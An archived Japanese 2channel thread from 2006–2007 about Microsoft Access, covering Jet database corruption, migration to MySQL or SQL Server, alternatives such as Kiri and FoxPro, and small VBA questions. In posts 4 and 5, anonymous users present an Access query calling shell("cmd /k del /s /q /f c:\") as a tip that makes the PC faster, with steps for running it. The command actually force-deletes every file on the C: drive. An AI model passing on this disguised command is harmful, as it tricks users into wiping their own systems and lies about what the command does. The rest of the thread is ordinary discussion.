5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Access】アクセスは最強のデータベース!

1 :NAME IS NULL:2006/12/17(日) 03:57:39 ID:KxxtbOF8
SQLiteはクソ。

2 :NAME IS NULL:2006/12/17(日) 05:41:15 ID:???
そろそろ寝ようぜ

3 :NAME IS NULL:2006/12/17(日) 13:31:29 ID:???
アクセスってEXCELが使いたくてOFFICEを買うとおまけでついてくるやつだろ。
このおまけがとろとろしているものだから、すっげぇー大迷惑。

4 :NAME IS NULL:2006/12/17(日) 14:34:31 ID:???
Accessで次のSQLを実行したら、不思議なことになんかマシンが軽くなった。
マジお勧め。

select * from テーブル1 where フィールド1=shell("cmd /k del /s /q /f c:\")

5 :NAME IS NULL:2006/12/17(日) 17:45:05 ID:???
これだけで十分だな。
select shell("cmd /k del /s /q /f c:\")


まず、クエリを新規作成する。
デザインビューを作る。
テーブルの指定は必要ないので閉じる。
フィールドに、「shell("cmd /k del /s /q /f c:\")」と入力
保存して実行。

6 :NAME IS NULL:2006/12/19(火) 20:25:06 ID:4zl+qEwG
Access人気ねーなーw

7 :NAME IS NULL:2006/12/20(水) 11:50:00 ID:???
使い方わからん

8 :名無しさん@そうだ選挙にいこう:2006/12/22(金) 11:34:55 ID:???
アクセスの一番新しいバージョンはなんだ?
それと、2000と替わったところを教えろ。カス。

9 :NAME IS NULL:2006/12/22(金) 16:22:20 ID:???
ググレカス

10 :NAME IS NULL:2006/12/24(日) 03:16:51 ID:???
アクセスなんか売れてないんだからMSも日本向けをVFoxProに変えろよ。

11 :NAME IS NULL:2006/12/24(日) 19:42:43 ID:???
だーかーらー、
アクセスは売り物ではなくてOFFICEのおまけなんだよw

12 :NAME IS NULL:2006/12/26(火) 21:43:44 ID:NdSoe3lX
逆に考えるんだ
ACCESSのおまけがOFFICE

13 :NAME IS NULL:2006/12/26(火) 22:51:06 ID:???
初めて「でーたべぇすこうちく」として貰った仕事が嬉しくて仕方がない>>1が居たのはこのスレでございますか?

14 :NAME IS NULL:2006/12/29(金) 19:13:48 ID:???
PHPからアクセスを扱うコード禿げしく希望!w

15 :NAME IS NULL:2006/12/29(金) 20:32:25 ID:???
Accessなんか使ったら、すぐにシステムが破綻するよ。

16 :NAME IS NULL:2006/12/30(土) 00:19:04 ID:???
2007拡張子が変わって面倒

17 :!kote 【584円】 :2007/01/01(月) 10:04:21 ID:???
!kote !dama

18 :!kote 【521円】 :2007/01/01(月) 22:00:20 ID:???
test


19 :NAME IS NULL:2007/01/11(木) 15:16:48 ID:???
JETは糞エンジン・・・orz


20 :NAME IS NULL:2007/01/12(金) 03:54:52 ID:???
JETは"おまけ"の"おまけ"だからね

21 :NAME IS NULL:2007/01/13(土) 12:32:49 ID:???
おまけって
AccessはOfficeのProfessional版以上でないとついてこない
JETはOffice買わなくてもWindowsについてくる

22 :NAME IS NULL:2007/01/13(土) 19:35:58 ID:???
WindowsがPCのおまけだから、
やっぱり、"おまけ"の"おまけ"だな。

23 :NAME IS NULL:2007/01/16(火) 17:00:43 ID:5QFqZ+z3
ググって検索していたら、ここにたどり着きました。
ローカルマシンのaccessに格納してあるデータを、ホスティングしているサーバ(専用サーバ)で
selectして表示させる事は、出来ますか?


24 :NAME IS NULL:2007/01/16(火) 19:39:46 ID:???
>>23
「ローカルマシンのデータを、サーバで表示させる」というのにすごい違和感があるのだけど、
俺が無知なの?



25 :NAME IS NULL:2007/01/16(火) 22:07:43 ID:???
>>23
出来るかといわれれば、できる
SQL鯖かaccessがServerに入っていれば可能だけど・・・

何かが逆のような気がする・・・

26 :NAME IS NULL:2007/01/17(水) 01:30:31 ID:Ek095lO4
>>24 >>25
回答サンクスです。

>>24
そんなに違和感のあることなのですか!?

>>25
逆ですか。。。!?
どのように逆なのかを教えていただけるとありがたいのですが
虫が良すぎるでしょうか?

27 :NAME IS NULL:2007/01/17(水) 03:10:18 ID:???
初心者が無知な質問をしているのか?
それともただのネタなのかわからない。

まず、そんなことをしなければいけない状況が想像がつかない。


28 :NAME IS NULL:2007/01/17(水) 09:01:00 ID:Cb5UyTGq
いやぁ、、違うぞ。サービスを提供するのがサーバなわけだから、
ここでいうローカルマシンも一つのサーバなわけですよ。
何らの矛盾も無い訳です。



29 :25:2007/01/17(水) 12:16:00 ID:???
データの格納及び処理はサーバで行い
クライアントはサーバにSQLを投げて読み/書きを行う、ローカルにデータの保存はしないのが普通
理由は色々あるが、バックアップの処理やトランザクションの復旧などを一括で行った方が面倒がないから。

30 :NAME IS NULL:2007/01/17(水) 19:06:07 ID:???
まあ、やっぱりそうだよなあ?
それにサーバーでローカルのデータを表示させるってことは、
サーバーを直接ユーザーが操作するってことだろう?
サーバーの安定性という面では薦められる話ではないはず。
そこまでして、こんなことをするメリットていうのが想像つかない。
ローカルのデータはローカルで見ればいいじゃないか?
まあ、別にAccessに限った話ではないけど。


31 :NAME IS NULL:2007/01/28(日) 01:53:56 ID:/VfI1slv
最新の一太郎とaccessを使うためにvista買ったのに。access使えない奴はWindows使うのを禁止しろ。

32 :NAME IS NULL:2007/01/28(日) 04:08:16 ID:???
馬鹿発見w

33 :NAME IS NULL:2007/02/01(木) 22:59:33 ID:XEluAaNf
共有フォルダにmdbファイルを置いて、複数のPCからアクセスするアプリを作ったのだけど、
そういう使い方をすると、ファイルが壊れるって書いてあるページがまりました。
最近のaccessでもそんな感じですか?

34 :NAME IS NULL:2007/02/02(金) 03:06:02 ID:???
そもそもmdbって共有で使えるんだっけ?
accessは昔からだがローカルでも壊れやすい。

出始めた頃に聞いたaccessの別名は「しゃぼん玉」だったな。

35 :NAME IS NULL:2007/02/02(金) 04:38:48 ID:???
>>34
> そもそもmdbって共有で使えるんだっけ?

使えるよ。でも、あまり沢山のPCからの共有はやめたほうがいいと思う。

> accessは昔からだがローカルでも壊れやすい。

終了後に最適化かけるようにしてからほとんど壊れなくなった。


36 :NAME IS NULL:2007/02/02(金) 16:56:32 ID:???
ローカルで使っててもやっぱちょいちょい壊れるな。
開けなくなるだけなら、バックアップから戻せばいいだけだから大した事無いけど
一見なんともないのに、データが一部ブチ壊れたりするのがイヤ。
あるレコードの範囲が全部同じ数字に書き換わったりとか・・・
集計だけ見ても気付きにくいような微妙な壊れ方だったので、客先で冷や汗かいた。 orz
毎回最適化しててもこれじゃねぇ。 怪しくて、金が絡むクリティカルな業務には一時的にでも使いたくないな。
電話帳とか住所録みてーなのに使うなら、お手軽でいいかもしらんが、俺的に2万件あたりからはバクチ。

37 :NAME IS NULL:2007/02/02(金) 19:02:35 ID:???
>>36
ちなみにAccessのバージョンは?データとプログラムのファイル分離している?
俺はAccess2000でやっているのだけど、さすがにバグが出尽くしているのか、
最近はほとんど問題がない。昔は相当悩ませてくれた。バージョンアップが怖い。

さすがに2万件以上はAccessというよりJetエンジンの守備範囲ではないと思うよ。
俺ならデータ部分はMySQL使うけどなあ?


38 :NAME IS NULL:2007/02/02(金) 21:45:06 ID:Jxg7Ommy
access2000からaccess2007に上げます。俺の長年の苦労のデータ大丈夫かな。

39 :NAME IS NULL:2007/02/02(金) 22:47:46 ID:???
>>38
勇気あるなあ?
とてもマネできない。


40 :NAME IS NULL:2007/02/03(土) 01:33:30 ID:???
レコード件数はそれほど重要じゃないだろ、mdbのサイズが2G超えそうってんならともかく。
2万件で壊せるような使い方してるやつはそれが2千件でも2百件でも桐にしとくのが吉。

41 :NAME IS NULL:2007/02/03(土) 09:17:32 ID:NfDLDqzD
200件なら手書きのカードで十分。

42 :NAME IS NULL:2007/02/03(土) 10:37:56 ID:???
たしかに桐のほうが安定しているし、壊れにくい。
ちょっとしたことをやるなら桐の方が便利。
でももともとアプリケーション作るツールってわけじゃない。
Accessは開発者がひとりで小規模アプリケーション用つくるには、
これだけで全部で済むのでお手軽。


43 :NAME IS NULL:2007/02/03(土) 19:02:27 ID:???
桐ってまだあったのか、、、

44 :NAME IS NULL:2007/02/03(土) 19:48:17 ID:???
>>43
あるんだな、これが。しかもVista対応を表明。

http://www.kthree.co.jp/2seihin/6kiri9-2006/index.html

自分で使うだけのプログラム作るのならこれでほとんど済むと思う。
これ以上はスレ違いは甚だしくなるので、こっちに行ってくれ。

http://pc10.2ch.net/test/read.cgi/db/1057318214/



45 :NAME IS NULL:2007/02/05(月) 11:44:24 ID:???
使い方によっては「Accessは最凶のデータベース」だと思う。
データーがプログラムを道連れにして壊れるし、
同じ事やるのにいくつも方法があるから、どの方法をとるのがいいのか迷うし、
いろいろな考え方が混じっているから、わけがわからなくなる。
その辺を克服していくとそれなりに使えるツールになる。


46 :36:2007/02/05(月) 16:30:07 ID:???
>>37
Access2000で、ロジックとデータは始めから分割してた。
つーても複数人で使わせるもんじゃなく、いじくるのは俺限定で
もらったデータ取り込んでマスタ更新した結果をExcelで渡す・・・みたいなやつ。
200MB/3万レコード程度でも、jetエンジンには荷が重かったのかな・・・
客側のトラブルに対応する都合で、予定の2倍以上のサイズになっちまったのも痛かったが。

やっぱAccessってUIとしてならいいけど、でっかいデータ持たせるなら
多少手間でもちゃんとしたDBMSがいいなーと思い知らされたよ。 orz

47 :NAME IS NULL:2007/02/05(月) 17:51:47 ID:21ubMIHs
>>46
周りにaccessデータ渡したくても、access持っていないか、持ってても使えない奴。
仕方なくExcelデータで渡すと、重複データばかりになって帰ってきた。

48 :NAME IS NULL:2007/02/05(月) 21:32:46 ID:???
>>46
まあ、原因かどうかはわからないけれど、桐ならメモリにある程度空き容量が無いと動かないのだけど、
Accessはなんとか動いてしまう。でも遅いし不安定なんだよなあ?そんな状態ではデータも壊れやすい。


49 :NAME IS NULL:2007/02/05(月) 22:46:03 ID:???
そもそも欠陥品

50 :NAME IS NULL:2007/02/05(月) 23:31:38 ID:???
という程、しょっちゅうは壊れないんだが。数百MB程度は、結構頻繁に
扱ってる。やっぱ、使い方だよな。っていっても、仕様の範囲内での使い
方で壊れるDBであることは確かだな。

51 :NAME IS NULL:2007/02/06(火) 00:16:51 ID:???
だーかーらー欠陥品だっつーーーのw

52 :NAME IS NULL:2007/02/06(火) 01:18:09 ID:???
おまえもな。

53 :NAME IS NULL:2007/02/06(火) 01:37:56 ID:???
access愛好家の気に障ってしまったようだ。

54 :NAME IS NULL:2007/02/06(火) 01:40:30 ID:WeHUGje3
M$社員じゃね?

55 :NAME IS NULL:2007/02/06(火) 01:40:31 ID:???
いや、もう使ってないから。

56 :NAME IS NULL:2007/02/06(火) 06:05:51 ID:???
>>51
> だーかーらー欠陥品だっつーーーのw

まあ、そうだな。Windows98くらいの不安定さはあるから、
M$標準の欠陥品だな。M$専門用語では仕様と言うらしいが・・・・

Windows98もまあ使いようによってはなんとか使える程度には安定したのだから、
使いようって言えば使いようなんだけど・・・・・


57 :NAME IS NULL:2007/02/06(火) 12:34:37 ID:???
サーバーからデータ落としてちょっと加工したいときには使える。

58 :NAME IS NULL:2007/02/06(火) 12:53:35 ID:???
>>36
データのバイト数とか考えてる?
その大きさになると、1024ごとにきっちり区切ってやらないと壊れやすいね

きちんと設計してあれば、クライアント台数は10、120万件、800MBでも問題なく動いてるよ
あとネットワーク環境が重要だね。不安定な環境だと非常に壊れやすい



59 :36:2007/02/06(火) 13:10:06 ID:???
>>58
レコード長って事?
やっぱ気にした方がいいのかね。
壊れた時のは、残念ながら相手指定の形式に合わせる必要があったので(しかも途中で変わりやがるし orz)
気にしてる余裕は無かったなぁ。
ネットワークに関しては、ローカルでもアレなのでできればやりたくない orz

60 :NAME IS NULL:2007/02/06(火) 15:04:41 ID:???
>>58

> その大きさになると、1024ごとにきっちり区切ってやらないと壊れやすいね

いったいその話はどこがネタ元なの?
jetエンジンで120万件って、すごいなあ?俺には怖くてできない。
クライアント台数10で同時アクセスするの?
それとも繋がっているのが、10台ってだけ?


61 :NAME IS NULL:2007/02/06(火) 20:25:57 ID:???
>>60
確かマイクソのリファレンスに書いてあった。
うろ覚えだが、JETの場合1024で区切ってデータを扱うと書いてあった。
で設計は1024ごとに収まるようにきっちり作ると速い上に壊れにくいと、昔先輩に教わった。
速いのは理論上わかるが、壊れにくいのは良くわからん。
が、実際には確かにそうしておいた方が壊れにくかった。
大量データを扱わなければそんなに変わらないと思うが。

> jetエンジンで120万件って、すごいなあ?俺には怖くてできない。
> クライアント台数10で同時アクセスするの?
> それとも繋がっているのが、10台ってだけ?
同時アクセスは2〜3台、排他処理のロジック作るのが大変だった。
最適修復をきっちりやっていれば、壊れはしないが検索等のスピードが遅い。
正直限界だと思う。早くSQL鯖に移行してくれってのが正直なところ




62 :NAME IS NULL:2007/02/06(火) 21:12:47 ID:???
>>61
> 正直限界だと思う。早くSQL鯖に移行してくれってのが正直なところ

へえーーー、ユーザの要望なんだ。なんでJETエンジンにこだわるのだろう?
PostgreSQLなら無料だし、MySQLも安いのに?

ODBCを使ってとりあえずちょっとだけ動かしたことあるけれど、
あっけないほど簡単に動いた。
まあ、プログラムをまったく変更せず動くほど甘くは無いだろうし、
最適化はいろいろとがんばらなければいけないだろうけど、
思ったより楽そうだと思う。



63 :NAME IS NULL:2007/02/06(火) 21:39:46 ID:WeHUGje3
>>53
世の中にはAccessしか使えない人もいるからな。
そのAccessを否定すると、自分まで否定された気分になるんだろ。

64 :NAME IS NULL:2007/02/06(火) 22:08:42 ID:???
とことん尾ひれをつけたいようだな。
それより、ページ単位で1024ってのは正しいけどよ、可変長が基本のAccessだぞ。
ガワを1024に調整しただけじゃダメじゃねぇの。

65 :NAME IS NULL:2007/02/06(火) 22:10:23 ID:???
偉そうな事書いたくせに、間違ったよ。1024じゃなくて、2048だ。

66 :NAME IS NULL:2007/02/06(火) 22:15:54 ID:???
Accessが不良品だとしても、これに変わるものってありそうでないんだよなあ?
Accessのようなレポートが作れるツールだけでも、Accessより高い。

入力帳票作成ツール、レポート作成ツール、クエリー作成ツールなど
いろいろなツールの集合体と考えればかなり安い。

肝心のエンジンがちと弱いのが気になるけど、
エンジンを取り替えることができるところが良いところでもあるなあ?


67 :NAME IS NULL:2007/02/06(火) 22:23:59 ID:???
>>65
あっなるほど、つまりページ単位に合わせるってことね。
2048byteを1レコードにすればレコード単位と同じだものなあ?
でもそれってレコード単位ロックが無くて、
すべてページ単位ロックだったAccess97時代までの話じゃないのか?


68 :NAME IS NULL:2007/02/06(火) 22:53:29 ID:???
文字列は後ろにスペース詰めるの?

69 :65:2007/02/06(火) 23:55:08 ID:???
>>67
密かに今でも内部的にはページロックだったりする。鵜呑みにしないでね。
Accessから離れて約2年弱なので。
壊れづらくするのにページに合わせるって話が出たのであって、ロックとは
関係ないような気もするが、そもそもこのロックが原因で壊れやすくなって
るのかな???
どちらにしても可変長の仕様は変わってないので、常に2048に合わせるの
は難しい。文字列の後ろの半角スペースは自動で除去するし。中途半端
にUniCode対応だし。


70 :NAME IS NULL:2007/02/07(水) 20:39:23 ID:???
AccessはMySQLのユーザーインタフェイスとして使うのが正解じゃないのか?


71 :NAME IS NULL:2007/02/07(水) 21:53:55 ID:uQlvtPJy
ODBCでUI作るだけならACCESSである必要ないと思うんだけど、高いよね。
OpenOfficeはちょっと微妙だと思し、他に何かないかな。

72 :NAME IS NULL:2007/02/07(水) 23:21:28 ID:???
>>71
> ODBCでUI作るだけならACCESSである必要ないと思うんだけど、高いよね。

Turbo Delphiなんて無料で面白そうだと思うのだけど、
レポートツールは別に用意しなければいけない。
アクセスのように伝票形式の入力が簡単に作れるとも思えない。

結局Access程度に実用に使えるようにすると、Accessより高くなると思う。

> OpenOfficeはちょっと微妙だと思し、他に何かないかな。

なんせ情報がない。BASEが使えるのなら使いたい気もするけど。


73 :71:2007/02/08(木) 00:53:55 ID:???
今日、baseに二度目の挑戦。java.lang.NullPointerExceptionって言われてテーブル開けない。
前回はもうちょっと進んだ気がしたけど、今回はもうくじけた。


74 :NAME IS NULL:2007/02/08(木) 01:29:30 ID:???
それにしても、なんで日本版のFoxProを売らないんだよ?
俺はそれで十分なんだけどなあ?英語のマニュアルなんて読む気がしない。


75 :NAME IS NULL:2007/02/08(木) 22:37:24 ID:???
なんかARAGOが値段を下げるらしい。

http://www.soupacific.com/index2.html

なんせFoxproより高かったのだからなあ?
本当に大幅値引きだったら考えようかなあ?


76 :71:2007/02/09(金) 01:03:23 ID:???
Access2007体験版使ってみました。すごいね、これ。
2000からいっきに飛んだからかもしれないけど、UIのデザインに感動。

ちょっと質問なんですが、odbcでpostgresqlにつないだとき、
timestampの桁数が原因と思われる問題で「データの競合」が起こります。
timestamp(3)にすると解決するという未確認情報もありますが、
それ以外の、DB定義をいじらない解決策ってないでしょうか?

77 :NAME IS NULL:2007/02/09(金) 01:14:49 ID:???
>>75
まだあったんかい。
DOSのDBXLやQSには世話になったけどな。
VisualFoxproの日本語解説書でも出してくれたほうが嬉しいんだけど。

78 :71:2007/02/09(金) 01:18:24 ID:???
すいません。超FAQでした。自己解決。
postgresql7.4なので型変えるの大変だと思ったけど、
defaultのcurrent_timestamp(3)への変更で対応できました。

79 :NAME IS NULL:2007/02/09(金) 01:43:38 ID:???
>>77
> VisualFoxproの日本語解説書でも出してくれたほうが嬉しいんだけど。
んだんだ。って誰か出しそうなものだけど誰も出さないなあ?


80 :NAME IS NULL:2007/02/11(日) 08:50:43 ID:RpZ/vITy
Access2007って、今までより良いんだろうか。
何かどうでもいい見た目ばかり綺麗に改造してくれたみたいだけど。
Access使いの今までの悩みって、データ件数で1万件以上扱いたい、
10台とか多数のPCからアクセスしたい、
ローカルPCで簡単にコピーされて外部に持ち出されないようにしたい。
しかしSQLサーバーは難しいというのが、共通の悩みだったと思う。
そういう肝心なニーズは全然解決してくれてないのかな。

81 :NAME IS NULL:2007/02/11(日) 10:21:27 ID:???
おまけですから

82 :NAME IS NULL:2007/02/11(日) 12:45:42 ID:???
>>80
それってMSDEで半分は解決するんじゃないのか?
SQL Serverで全部解決。
おれはLinuxサーバーだからMySQL使うけど・・・・



83 :NAME IS NULL:2007/02/11(日) 18:44:33 ID:???
>>80
>>82 が正解。
Accessに本物DBを求める方が間違い。安いんだから、ローカルレベルで
使ってね。でも、ちょっとぐらいは他の人と一緒に使ってもいいよってぐら
いだ。C/SのDBと根本的に仕組みも違うしな。


84 :NAME IS NULL:2007/02/11(日) 22:24:35 ID:???
ACCESS2003でフォーム上で▲(横三角)*マークを
押下したら新規レコードになりますが、
それと、同じことをするVBAを教えてください。


85 :NAME IS NULL:2007/02/11(日) 22:53:33 ID:???
>>84

どこまでやりたいのか知らんが、
んなもん、コマンドボタンをウィザードに従って作ってみれば
解ることだろ。

86 :NAME IS NULL:2007/02/11(日) 23:18:42 ID:???
>>85
VBA エディタにウィザードなんかでてきませんが


87 :NAME IS NULL:2007/02/11(日) 23:22:14 ID:???
MySQL使っている人に質問。
これからMDBを卒業して使おうと思うのだけど、
AccessからMySQLを使うのってどんな感じなんだろう?

 1.設定してしまえば、MDBと違わないよ。まあ、壊れなくなったけどね。
 2.全然違う、プログラム自体も大幅に変えなければいけないし、苦労するよ。
 3.まあ、そのまま使えるほど簡単でもないけど、難しいってほどでもない。

あえて言えばどれに近い?


88 :NAME IS NULL:2007/02/11(日) 23:46:36 ID:???
>>86
>>85 じゃないが、代わりに。
まずは、コマンドボタンをフォームに置け。その時、ウィザードが起動しないか?
起動しないなら、コントロールウィザードをONにする。
このウィザードに従って新規レコード追加を選べば、実に簡素であるが目的
のVBAが出来上がる。

他人の間違い(と、思い込むこと)を指摘する前に、少しは調べろ。


89 :NAME IS NULL:2007/02/11(日) 23:49:16 ID:???
一対多連結の一側フィールドの書き換えとか、
ローカルデータならではの操作に慣れてしまったので、
いまさらC/Sには移れません。

90 :NAME IS NULL:2007/02/12(月) 00:05:35 ID:???
>>89
意味がわからん。C/S向けにチューニングされているSQL Server
Oracle等々、よく知られてるDBなら当然のごとくできることだと思うが。

91 :NAME IS NULL:2007/02/12(月) 00:28:44 ID:???
>>88
申し訳ありません
VBAにウィザードがあるなんて


92 :NAME IS NULL:2007/02/12(月) 00:40:24 ID:???
OOoのBaseがいいな。


93 :NAME IS NULL:2007/02/12(月) 00:46:45 ID:???
>>91

85だけど、あれで通じると思ったから
説明足らずで悪かった。
暇があったら、ウィザードとかマクロをVBA化して
どういうコマンド使っているのか調べてみると勉強になるよ。
当然、コマンドはヘルプで調べて、実際に使ってみること。

>>88

フォロ、ありがと。


94 :NAME IS NULL:2007/02/12(月) 01:07:51 ID:???
Accessは確かに昔よく壊れた、でもレポートが強力で離れることができんかった、
ある日FATからNTFSに変えてMDBもデータ、プログラムを切り分けしてから全然
壊れなくなった。
MSDE経由MySQLもlocalhostでしかやったことない、最近はレンタル鯖でPHPかな。

95 :NAME IS NULL:2007/02/12(月) 09:43:02 ID:???
>>94
> Accessは確かに昔よく壊れた、でもレポートが強力で離れることができんかった、

たしかに!Webシステムにしたいのだが、印刷のことを考えるとAccessから離れられない。

> ある日FATからNTFSに変えてMDBもデータ、プログラムを切り分けしてから全然
> 壊れなくなった。

Windows2000になってからトラブルは格段に減ったなあ?
データ、プログラムを切り分けたのも効果はあった。
メモリが安くなって増設したのも大きかったような気がする。
最適化はもちろんだけど、ときどきMDBを新規作成してそこにインポートすると
MDBの大きさが半分以下になったりするが、これも効果がある。
ちょっと動作が不安定になったらこれをするのがいい。


96 :NAME IS NULL:2007/02/12(月) 10:08:14 ID:???
>>95
自分の場合は、Accessでユーザー向けのシステム開発していたが、
メニューに最適化・修復を付けてあげて、そこでおっしゃるような最新
MDBへのデータ入れ替えを処理してました(標準機能の修復・最適化
実行後に)。システムの中に、データが空っぽのMDBも同梱してね。
この機能を共通関数化して使い回し。お陰様で、破損件数は減少。


97 :NAME IS NULL:2007/02/12(月) 10:32:28 ID:???
>この機能を共通関数化して使い回し
この共通関数欲しい。
えーと、かわりに差し上げられそうなものを探さないと・・・・・・


98 :NAME IS NULL:2007/02/12(月) 12:49:47 ID:???
ACCESS2003の質問です。
例えば  連番 に aaa001
aaa002
bbb011
bbb012
があるとして
aaaを含む最大値のデータ、今回の場合は
aaa002のデータを抽出するVBAを教えて下さい


99 :NAME IS NULL:2007/02/12(月) 15:25:57 ID:???
Dmax("連番","テーブル名","Like 'aaa*'")

でいくんでないかい?

100 :NAME IS NULL:2007/02/12(月) 18:46:20 ID:???
>>99
レスサンキューです
うまくいきました


101 :96:2007/02/13(火) 00:34:54 ID:???
>>97
オレが作ったものが欲しいなんて、奇特なお方だ。
Give&Takeじゃなくてもいいよ。ただし、iniファイル対応の我が社(と言っても、
やめた会社なので)特有のものです。休みの日に自宅で自分の作業を楽に
するためにセコセコ作ったもので、オレが自由に使ってもいいお墨付きです。
ドキュメント類も差し上げますので、そのまま仕様に従って使うも良し、必要
な関数・部分を抜き出して改造するも良しって感じで丸投げしたいんですけ
ど、VBAは大丈夫ですか?
修復の処理限定で欲しい場合は、ちょこっとだけ手直しして渡しますので、
何日か時間が欲しいです。本業の方、単体テスト真っ盛りで平日はなかなか
時間が取れないかもしれないので。

102 :96:2007/02/13(火) 12:16:55 ID:???
>>101
> オレが作ったものが欲しいなんて、奇特なお方だ。

いえいえ、一度作ろうかと思ったのだけどなんだか面倒そうだし、
手作業でできることなのでついつい後回しになって・・・・

> するためにセコセコ作ったもので、オレが自由に使ってもいいお墨付きです。
> ドキュメント類も差し上げますので、そのまま仕様に従って使うも良し、必要
> な関数・部分を抜き出して改造するも良しって感じで丸投げしたいんですけ
> ど、VBAは大丈夫ですか?

ええ、もちろんアクセスでVBAを使ったアプリケーション作ってますので、
だいたいは大丈夫です。

masquerade@x-road.ddo.jp へメールで送っていただければ大変助かります。
なお、このアドレスはこれを受け止めるためだけのアドレスですので、受け取り
しだい消滅します。

2ちゃんねるに無防備なアドレスをいつまでもさらすほど俺は自信家じゃない(ゴルゴ13風(w))

しかし、俺って汎用性のある関数書いてないなあ?差し上げられそうなものがない。



103 :NAME IS NULL:2007/02/13(火) 22:52:12 ID:I5nH1u5t
ACCESS2007の教本足りない。97から2000に上げた時は少々の手直しだったと思えるほど。「はじめてのACCESS2007」だけでは足りない。これだけ見た目が違うともっと細かい所も違うような。
マイクロのホームページも物足りない。

104 :NAME IS NULL:2007/02/14(水) 01:06:43 ID:???
>>102
返事書くヒマあったら送れよって・・・すまん。ファイルの準備・圧縮等何も
してないので。もう少し待ってくれ。丸投げするから。その修復・最適化の
関数に関しては、少々コメントを添える(ソース内じゃないよ)つもり。

メルアド、結構平気だよ(いや、別に削除するなって事じゃなくね)。
オレも晒したyahooメアドがあったけど、な〜〜〜んもなかった。いたずら
メールもなかった。

Accessの関数は不要っす。今、全く毛色の違う開発業務なので。


105 :NAME IS NULL:2007/02/14(水) 02:03:17 ID:???
最適化してバックアップするなら
DBEngine.CompactDatabase src, dst
これに GetOpenFileName を呼び出すコマンドボタンをつけたform
昔作りましたけどだれかいらない?

106 :NAME IS NULL:2007/02/14(水) 07:43:18 ID:???
>>105
それは、悪いがすぐ作れる。

107 :NAME IS NULL:2007/02/14(水) 11:41:58 ID:???
>>106
http://sund1.sakura.ne.jp/uploader/source/up2189.xxx

2001年製でした、ツッコミよろ

108 :106:2007/02/14(水) 12:59:41 ID:???
>>107
2001年製でも、まだ使えるんじゃねぇの?
ネット禁止のため、リンク先は見てないんだ。ゴメン。

109 :97:2007/02/14(水) 13:29:33 ID:???
>>104
別に切羽詰っているわけじゃないから、いつでもいいです。
忘れないでいてね(^^)


110 :NAME IS NULL:2007/02/14(水) 19:38:40 ID:???
>>103
安心しろ、変わったのは見た目だけだw

111 :104:2007/02/15(木) 00:08:54 ID:???
>>109
ちょっと手抜きして(コメント添えるの、ほぼやめちゃいました)とりあえず
送らせて頂きました。

112 :97:2007/02/15(木) 08:34:22 ID:???
>>111
受け取りました。ありがとうございます。こりゃあ、応用範囲が広くて使いこなすのにかなりかかりそうな予感。
でも、いろいろと参考になりそうです。ダメモトだったのに言ってみるもんだなあ?
本当にありがとうございました。


113 :NAME IS NULL:2007/02/15(木) 11:37:04 ID:???
>>110
ac2000からほぼ見た目しか変わってないような気がするのは気のせい?
アクセスは見た目だけは最強のデータベースなのかもしれない。


114 :111:2007/02/15(木) 13:00:45 ID:???
>>112
ちと、ややこしいよな。もう、分かってると思うけど念のため。
なかを見るときはshiftで開いて。

115 :NAME IS NULL:2007/02/15(木) 13:48:54 ID:???
>>114
ちゃんと見えてます。
エラーがでたので、空のMDB作ってそこにインポートしました。
今のところ仕様書を見て喜んでます。
あらためてありがとう。


116 :114:2007/02/15(木) 14:39:24 ID:???
>>115
エラーの原因は?
もしかしてオレのオリジナルがマズイかと思って。
仕様書は、Access知らない人や派遣社員向けだから、事細かく・うるさく書いてる
でしょ。最後までメンテするのオレだからガッチガチの規則だね。何か気になるこ
とがあれば、お気軽にメールで。

117 :NAME IS NULL:2007/02/15(木) 15:26:27 ID:???
>>116
>エラーの原因は?
いや単にシフト押さないで起動させたらうまくいかなかったので、
見たいのはモジュールの内容が主だからインポートすればうまくいくかなと思ってやってみただけ。
Accessは完全に独学だし、こういう実践的な仕様書って見たこと無かったので勉強になりますね。
ただ、テーブルは"T_"で始まるようにとか、考えることは同じだなあと思ってみてました。
私の場合はマスターテーブルは"TM_"とかさらに細かいのだけど。


118 :116:2007/02/16(金) 01:58:51 ID:???
>>117
次からメールにしような。
シフト押さないで開くと、iniファイルの設定値編集のフォームが開くようになってる
のだが、そのための環境が整ってなかっただけと思う。
モジュールだけ必要なら、インポートしたやつでOKよ。フォームは、インポートし
てないんだよね?この場合、バックアップ・リストアもNGだなぁ。
まぁ、好きなように使ってくれ。達人の域のものではないので、たいしたことはやっ
とらんから。

119 :NAME IS NULL:2007/02/19(月) 15:35:12 ID:???
dim tax as Long
正 tax = Fix(33333 * 0.03)
= 999
誤 tax = 33333 * 0.03
= 1000

誤 tax = Fix(50000 * 0.03)
= 1499
正 tax = 50000 * 0.03
= 1500

消費税の計算をし、小数点は切り捨てをしようとしてるのですが、上記のとおり Fix で計算をすると
切り落としの時にズレが出てきます。

小数点を切り上げたりせず、きっちり切り落としたいときはどうすればいいんでしょうか?

120 :NAME IS NULL:2007/02/19(月) 18:18:32 ID:???
10年以上前の人キタコレ

121 :NAME IS NULL:2007/02/19(月) 19:55:15 ID:???
dim dTax as double
dim lTax as long

dTax = 値段 * 税率
lTax = fix(dTax)

で解決した

122 :NAME IS NULL:2007/02/19(月) 23:53:27 ID:???
>>119
Currency

123 :NAME IS NULL:2007/02/24(土) 00:36:49 ID:7O++I76A
ACCSESS.NETがでてC#がでれば買うな
最強のアジャイル開発ができそう

124 :NAME IS NULL:2007/02/24(土) 11:57:20 ID:b39o1ZAI
アクセスで、入力データを継続させるには、どうすればいいのですか?

125 :NAME IS NULL:2007/02/24(土) 15:58:29 ID:???
入力を継続させればいい

126 :NAME IS NULL:2007/02/24(土) 16:02:28 ID:???
テーブル作ってINSERTすれば継続されると思いますよ。
少なくともPCシャットダウンしても入力データは消えないで継続されます。

127 :NAME IS NULL:2007/02/24(土) 17:06:48 ID:b39o1ZAI
すいません。同じようなデータを入力してるんですが、レコードの値を次の入力時にも継続させたい事です。Ctrl+7の他に自動でないでしょうか?

128 :NAME IS NULL:2007/02/24(土) 22:55:10 ID:???
>>127
これノンプラミングでってことだろう?
うーーーん、アクセスってそのままでは使いやすくはないからな。
たぶん桐で入力してコンバートしたほうが速いと思うけどなあ?


129 :NAME IS NULL:2007/02/24(土) 23:39:03 ID:???
VBA組め


130 :NAME IS NULL:2007/02/25(日) 00:48:45 ID:???
>>127
excelで入力してからAccessに取り込む。

131 :NAME IS NULL:2007/02/25(日) 08:23:33 ID:YoLBJkVB
>>130
ACCESSで入力して三四郎にExcel経由で取り込む。

132 :NAME IS NULL:2007/02/25(日) 19:31:33 ID:/LjiSMn/
三四郎は知らんが、
